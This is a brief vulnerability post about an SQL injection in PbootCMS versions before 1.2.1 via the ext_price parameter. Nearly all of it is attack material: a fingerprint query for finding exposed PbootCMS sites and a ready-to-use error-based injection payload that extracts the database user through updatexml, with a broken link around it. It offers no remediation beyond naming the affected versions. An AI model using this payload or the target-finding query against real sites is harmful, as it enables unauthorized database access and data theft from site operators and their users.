Pbootcms Ext_price Sql Injection Vulnerability
Pbootcms Ext_price Sql Injection Vulnerability
PbootCMS ext_price SQL injection vulnerability
Vulnerability Description
PbootCMS has SQL injection vulnerability.
Vulnerability Impact
PbootCMS < 1.2.1
Network surveying and mapping
app=”PBOOTCMS”
Vulnerability reappears
Home page
Test Payload
/index.php/Index?ext_price%3D1/**/and/**/updatexml(1,concat(0x7e,(SELECT/**/distinct/**/concat(0x23,user(),0x23)/**/FROM/**/ay_user/**/limit/**/0,1),0x7e),1));%23=123](https://127.0.0.1/PbootCMS/index.php/Index?ext_price%3D1/**/and/**/updatexml(1,concat(0x7e,(SELECT/**/distinct/**/concat(0x23,user(),0x23)/**/FROM/**/ay_user/**/limit/**/0,1),0x7e),1));%23=123)
This post is licensed under CC BY 4.0 by the author.